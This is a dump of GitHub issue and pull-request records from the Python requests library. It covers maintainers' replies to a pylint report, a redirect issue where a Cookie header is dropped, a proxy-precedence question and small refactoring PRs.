'unicode' (undefined-variable)\n\nThere is on Python 2.\n\nAny of the errors on urllib3 are in the wrong module, which is even more obviously true of `six`.\n\nI'm being as polite as I can when I say that your tool is doing a _terrible_ job. I strongly advise you never to open a similar issue on a different repository, or you will likely encounter a much stronger negative reaction than this one.\n", "It looks like most of these are based around py2/3 compatibility which we have no intention of breaking. 
\n", "@Lukasa : I am following a well known practice that is detailed in Idiomatic Python author:\nhttp://www.jeffknupp.com/blog/2013/11/15/supercharge-your-python-developers/\nAlso detailed in Google coding standards.\nFWIW: pylint has caught many errors in my code and others in the past.\nWhile we may differ in our views, not placing value judgements. Just a data point.\nLike I said in my prior post, my intent is to weight differing approaches. Request at the top of that list.\n\nWas hoping that this kind ask would be more open to possible changes... looks like closed for discussion already.\n\nIf you guys are open, I'd be open to making changes once I had more time.\nBut then that would be un-welcomed based on your statement too.\nmy 2 cents\n", "To be clear: I do not believe anything that pylint has printed for modules outside `requests.packages` (which are third party code) is valid. I think everything it has said is wrong. If you can point to something that is not wrong, I will happily consider accepting a change based on it.\n\nI agree that pylint can catch errors. However, doing a drive-by dump of every line reported by pylint is not a helpful approach. Two notes for the future:\n1. Authors often have different views on Python style, particularly PEP8. Requests does not follow all of PEP8, and this is quite deliberate. You should _always_ consult a project's author before raising a bug report about their code failing a linter.\n2. You should validate the concerns of the linter before raising them. Open source maintainers are often very busy people, and asking them to validate each line of the linter's output for false positives is a rude way to behave. If you'd looked at these 'errors' first you'd have seen that they aren't valid.\n3. It's likely that you'll say we should add a `.pylintrc` file to address these concerns. That's not a good idea. 
We should not have to add a dotfile to the repository root for every person who writes a linter.\n", "Points taken\n\nMy apology for this faux pas\n\nSent from my iPhone\n\n> On Jan 20, 2015, at 10:19 AM, Cory Benfield [email protected] wrote:\n> \n> To be clear: I do not believe anything that pylint has printed for modules outside requests.packages (which are third party code) is valid. I think everything it has said is wrong. If you can point to something that is not wrong, I will happily consider accepting a change based on it.\n> \n> I agree that pylint can catch errors. However, doing a drive-by dump of every line reported by pylint is not a helpful approach. Two notes for the future:\n> \n> Authors often have different views on Python style, particularly PEP8. Requests does not follow all of PEP8, and this is quite deliberate. You should always consult a project's author before raising a bug report about their code failing a linter.\n> You should validate the concerns of the linter before raising them. Open source maintainers are often very busy people, and asking them to validate each line of the linter's output for false positives is a rude way to behave. If you'd looked at these 'errors' first you'd have seen that they aren't valid.\n> It's likely that you'll say we should add a .pylintrc file to address these concerns. That's not a good idea. We should not have to add a dotfile to the repository root for every person who writes a linter.\n> —\n> Reply to this email directly or view it on GitHub.\n", "@Lukasa \nAre you open to annotating source with comments disabling pylint warnings? Given that one [can](http://docs.pylint.org/faq.html#do-i-have-to-remember-all-these-numbers) use symbolic names of warnings/errors such annotation would serve as documentation at the same time which should be useful.\n", "@piotr-dobrogost Nope. =)\n\nMy concern is the potentially unbounded number of linters that we may be asked to support annotations or dotfiles for. 
Just because someone created a tool that they love doesn't mean we should add metadata to our codebase to support it. If the requests project uses a tool for its development, we'll add that metadata. Otherwise, we won't.\n", "@piotr-dobrogost Are you open to determining how many of those are false positives and constitute absolutely useless feedback from a linter? The majority of the errors are just plain **wrong** and any changes belong in pylint.\n", "https://github.com/PyCQA/pylint/issues/1411 is the pylint issue which unfortunately indicates that pylint will not support `requests.codes`.\r\n\r\nHowever, a workaround has been suggested for users: `generated-members`, documented in https://pylint.readthedocs.io/en/latest/technical_reference/features.html#id34.", "To be clear, Requests should not add `generated-members` support itself. If folks want to add it to their own CI that’s fine, but pylint’s failure to support this does not place a burden on us to support them.", "@Lukasa - yes, I wrote that comment to try to be helpful for people coming to this issue with the same issue that I had.\r\n\r\nThe hack that I did as a good-enough-for-me workaround was to run:\r\n\r\n```python\r\nimport string\r\n\r\nimport requests\r\n\r\npattern = '(requests\\.)?codes\\.({allowed}),'\r\naccepted_characters = set(string.ascii_letters + '_')\r\nkeys = [key for key in requests.codes.__dict__.keys() if set(key).issubset(accepted_characters)]\r\nprint(pattern.format(allowed='|'.join(keys)))\r\n```\r\n\r\nand then add the outputted string to my `pylint-rc`'s `generated-members` section." ]
https://api.github.com/repos/psf/requests/issues/2416
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2416/labels{/name}
https://api.github.com/repos/psf/requests/issues/2416/comments
https://api.github.com/repos/psf/requests/issues/2416/events
https://github.com/psf/requests/issues/2416
54,884,915
MDU6SXNzdWU1NDg4NDkxNQ==
2,416
Cookie header isn't passed when redirected
{ "avatar_url": "https://avatars.githubusercontent.com/u/1026154?v=4", "events_url": "https://api.github.com/users/Fizzadar/events{/privacy}", "followers_url": "https://api.github.com/users/Fizzadar/followers", "following_url": "https://api.github.com/users/Fizzadar/following{/other_user}", "gists_url": "https://api.github.com/users/Fizzadar/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Fizzadar", "id": 1026154, "login": "Fizzadar", "node_id": "MDQ6VXNlcjEwMjYxNTQ=", "organizations_url": "https://api.github.com/users/Fizzadar/orgs", "received_events_url": "https://api.github.com/users/Fizzadar/received_events", "repos_url": "https://api.github.com/users/Fizzadar/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Fizzadar/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Fizzadar/subscriptions", "type": "User", "url": "https://api.github.com/users/Fizzadar", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2015-01-20T13:50:37Z
2021-09-08T23:06:04Z
2015-01-22T14:24:32Z
NONE
resolved
The `Cookie` header isn't sent to redirected URL's like other headers is: ``` # Requests version = 2.5.1 ipdb> response.request.headers {'CustomHeader': 'this_still_works!'} ipdb> response.history[0].request.headers {'CustomHeader': 'this_still_works!', 'Cookie': 'token=top_secret_token; email="[email protected]";'} ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/1026154?v=4", "events_url": "https://api.github.com/users/Fizzadar/events{/privacy}", "followers_url": "https://api.github.com/users/Fizzadar/followers", "following_url": "https://api.github.com/users/Fizzadar/following{/other_user}", "gists_url": "https://api.github.com/users/Fizzadar/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Fizzadar", "id": 1026154, "login": "Fizzadar", "node_id": "MDQ6VXNlcjEwMjYxNTQ=", "organizations_url": "https://api.github.com/users/Fizzadar/orgs", "received_events_url": "https://api.github.com/users/Fizzadar/received_events", "repos_url": "https://api.github.com/users/Fizzadar/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Fizzadar/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Fizzadar/subscriptions", "type": "User", "url": "https://api.github.com/users/Fizzadar", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2416/reactions" }
https://api.github.com/repos/psf/requests/issues/2416/timeline
null
completed
null
null
false
[ "There isn't enough information to even begin to debug this. You're clearly being redirected.\n- Are you being redirected to new domain (or sub-domain)? (e.g., from `example.com` to `sub.example.com` or `example.org`)\n- Are you being redirected from `http://` to `https://`?\n- Where does the cookie come from?\n - Do you specify it yourself?\n - Is it in a cookie-jar to start with?\n - Are you using a session that collected the cookie for you?\n\nThese are just starting questions. I guarantee I'll have more once you answer them.\n", "Apologies @sigmavirus24, definitely short on info:\n- Redirect is append-slash like (`dev.local/api/test` -> `dev.local/api/test/`)\n- Both served over HTTP\n- Cookie is set in the headers dict passed to `requests.get`, no jar/session\n\nLet me know if you need anything else.\n", "So we [rebuild](https://github.com/kennethreitz/requests/blob/d2d576b6b1101e2871c82f63adf2c2b534c2dabc/requests/sessions.py#L168..L176) the `Cookie` header on a redirect as a matter of not exposing the cookie to people who shouldn't see it. Without a cookiejar to rebuild _from_ we won't persist the header through the redirect. We already [sanitize authorization](https://github.com/kennethreitz/requests/blob/d2d576b6b1101e2871c82f63adf2c2b534c2dabc/requests/sessions.py#L215) on redirect to different hosts, so we _could_ do the same here.\n\nI want @Lukasa's thoughts on this though before I continue with work for this.\n\nI, for one, think Cookie headers are in the same class as Content-Length and Host headers. They can be set by users but they really _shouldn't_ be set by users because it can do bad things if not handled with care.\n", "Agreed, cookies set in the headers have an unclear scope, so we assume their scope is extremely tight. I think that's a good behaviour.\n", "I agree, it's too much like \"cookie injection\" to send cookies as custom headers through redirects :)\n" ]
https://api.github.com/repos/psf/requests/issues/2415
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2415/labels{/name}
https://api.github.com/repos/psf/requests/issues/2415/comments
https://api.github.com/repos/psf/requests/issues/2415/events
https://github.com/psf/requests/pull/2415
54,830,688
MDExOlB1bGxSZXF1ZXN0Mjc2NDY0Njc=
2,415
Move noncebit to the only place it is used
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
null
[]
null
3
2015-01-20T00:51:27Z
2021-09-08T09:01:00Z
2015-01-27T18:22:53Z
CONTRIBUTOR
resolved
Since we only allow for "auth" qop-value, hardcode it Fixes #2408 I want to add tests but I'm not sure a good way to write them. =(
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2415/reactions" }
https://api.github.com/repos/psf/requests/issues/2415/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2415.diff", "html_url": "https://github.com/psf/requests/pull/2415", "merged_at": "2015-01-27T18:22:53Z", "patch_url": "https://github.com/psf/requests/pull/2415.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2415" }
true
[ "I merged the changes into my auth.py and it worked fine, both for my servers which offer qop=\"auth\" and for those which offer qop=\"auth,auth-int\".\nFrom my point of view the issue #2408 is fixed by this commit.\n", "Testing this is a nightmare, it's super stateful and you have to patch time and all sorts of weirdness. Let's just not.\n", "I'm really considering spending a weekend or something adding tests around stuff and re-factoring it because we should be able to add tests for this kind of thing.\n" ]
https://api.github.com/repos/psf/requests/issues/2414
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2414/labels{/name}
https://api.github.com/repos/psf/requests/issues/2414/comments
https://api.github.com/repos/psf/requests/issues/2414/events
https://github.com/psf/requests/issues/2414
54,724,438
MDU6SXNzdWU1NDcyNDQzOA==
2,414
Environment http_proxy will cover the Session property s.proxies
{ "avatar_url": "https://avatars.githubusercontent.com/u/1917483?v=4", "events_url": "https://api.github.com/users/syjiangrui/events{/privacy}", "followers_url": "https://api.github.com/users/syjiangrui/followers", "following_url": "https://api.github.com/users/syjiangrui/following{/other_user}", "gists_url": "https://api.github.com/users/syjiangrui/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/syjiangrui", "id": 1917483, "login": "syjiangrui", "node_id": "MDQ6VXNlcjE5MTc0ODM=", "organizations_url": "https://api.github.com/users/syjiangrui/orgs", "received_events_url": "https://api.github.com/users/syjiangrui/received_events", "repos_url": "https://api.github.com/users/syjiangrui/repos", "site_admin": false, "starred_url": "https://api.github.com/users/syjiangrui/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/syjiangrui/subscriptions", "type": "User", "url": "https://api.github.com/users/syjiangrui", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-19T04:05:17Z
2021-09-08T23:06:10Z
2015-01-19T08:58:29Z
NONE
resolved
When I use a proxy in my code I find a problem. In the code below ``` python s = requests.Session() s.proxies = {'http':'127.0.0.1:3128'} r = s.get("http://www.apple.com") ``` If I set environmet var http_proxy='http://192.168.1.100:3128' then the request will use environment proxy rather than the proxy I have set in the code. But if I use proxy like below the program will use the proxy which I set in the code. ``` python s = requests.Session() r = s.get("http://www.apple.com", proxies={'http':'127.0.0.1:3128'}) ``` Is there any issue?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2414/reactions" }
https://api.github.com/repos/psf/requests/issues/2414/timeline
null
completed
null
null
false
[ "Possible duplicate of #2109\n", "Nope, it's a definite duplicate of #2018.\n" ]
https://api.github.com/repos/psf/requests/issues/2413
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2413/labels{/name}
https://api.github.com/repos/psf/requests/issues/2413/comments
https://api.github.com/repos/psf/requests/issues/2413/events
https://github.com/psf/requests/pull/2413
54,724,003
MDExOlB1bGxSZXF1ZXN0Mjc1ODM4OTQ=
2,413
Check that filenames are unicode or bytes
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
{ "closed_at": "2015-04-06T01:57:33Z", "closed_issues": 4, "created_at": "2015-01-18T20:07:00Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }, "description": "", "due_on": null, "html_url": "https://github.com/psf/requests/milestone/23", "id": 940764, "labels_url": "https://api.github.com/repos/psf/requests/milestones/23/labels", "node_id": "MDk6TWlsZXN0b25lOTQwNzY0", "number": 23, "open_issues": 0, "state": "closed", "title": "2.6.0", "updated_at": "2015-04-06T01:57:33Z", "url": "https://api.github.com/repos/psf/requests/milestones/23" }
4
2015-01-19T03:54:01Z
2021-09-08T09:00:59Z
2015-01-27T18:23:18Z
CONTRIBUTOR
resolved
Instead of only checking one or another type of string-like object that we accept, let's be able to check both. Fixes #2411
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2413/reactions" }
https://api.github.com/repos/psf/requests/issues/2413/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2413.diff", "html_url": "https://github.com/psf/requests/pull/2413", "merged_at": "2015-01-27T18:23:18Z", "patch_url": "https://github.com/psf/requests/pull/2413.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2413" }
true
[ "Why are we not just using `basestring`?\n", "@Lukasa This is what I get for working on this way too late last night.\n\n@arthurdarcet thanks. Done.\n", "Thanks! LGTM. :cake:\n", "@Lukasa fwiw, I edited the commit message on my commit and retitled the PR to be more accurate descriptions of what's happening. The contents of the PR didn't change though.\n" ]
https://api.github.com/repos/psf/requests/issues/2412
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2412/labels{/name}
https://api.github.com/repos/psf/requests/issues/2412/comments
https://api.github.com/repos/psf/requests/issues/2412/events
https://github.com/psf/requests/pull/2412
54,722,570
MDExOlB1bGxSZXF1ZXN0Mjc1ODMwOTA=
2,412
Remove entirely unnecessary and unused bits from requests.compat
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
{ "closed_at": "2015-04-06T01:57:33Z", "closed_issues": 4, "created_at": "2015-01-18T20:07:00Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }, "description": "", "due_on": null, "html_url": "https://github.com/psf/requests/milestone/23", "id": 940764, "labels_url": "https://api.github.com/repos/psf/requests/milestones/23/labels", "node_id": "MDk6TWlsZXN0b25lOTQwNzY0", "number": 23, "open_issues": 0, "state": "closed", "title": "2.6.0", "updated_at": "2015-04-06T01:57:33Z", "url": "https://api.github.com/repos/psf/requests/milestones/23" }
2
2015-01-19T03:17:36Z
2021-09-08T09:00:58Z
2015-01-27T18:24:25Z
CONTRIBUTOR
resolved
A tiny refactor I noticed while looking into a separate bug.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2412/reactions" }
https://api.github.com/repos/psf/requests/issues/2412/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2412.diff", "html_url": "https://github.com/psf/requests/pull/2412", "merged_at": "2015-01-27T18:24:25Z", "patch_url": "https://github.com/psf/requests/pull/2412.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2412" }
true
[ "Fine by me. :cake:\n", "Hmmm, interesting.\n" ]
https://api.github.com/repos/psf/requests/issues/2411
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2411/labels{/name}
https://api.github.com/repos/psf/requests/issues/2411/comments
https://api.github.com/repos/psf/requests/issues/2411/events
https://github.com/psf/requests/issues/2411
54,706,715
MDU6SXNzdWU1NDcwNjcxNQ==
2,411
Requests 2.5.1 doesn't recognize unicode filenames for uploads
{ "avatar_url": "https://avatars.githubusercontent.com/u/80012?v=4", "events_url": "https://api.github.com/users/sjagoe/events{/privacy}", "followers_url": "https://api.github.com/users/sjagoe/followers", "following_url": "https://api.github.com/users/sjagoe/following{/other_user}", "gists_url": "https://api.github.com/users/sjagoe/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sjagoe", "id": 80012, "login": "sjagoe", "node_id": "MDQ6VXNlcjgwMDEy", "organizations_url": "https://api.github.com/users/sjagoe/orgs", "received_events_url": "https://api.github.com/users/sjagoe/received_events", "repos_url": "https://api.github.com/users/sjagoe/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sjagoe/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sjagoe/subscriptions", "type": "User", "url": "https://api.github.com/users/sjagoe", "user_view_type": "public" }
[]
closed
true
null
[]
null
19
2015-01-18T19:21:13Z
2021-09-08T23:05:43Z
2015-01-27T18:23:18Z
NONE
resolved
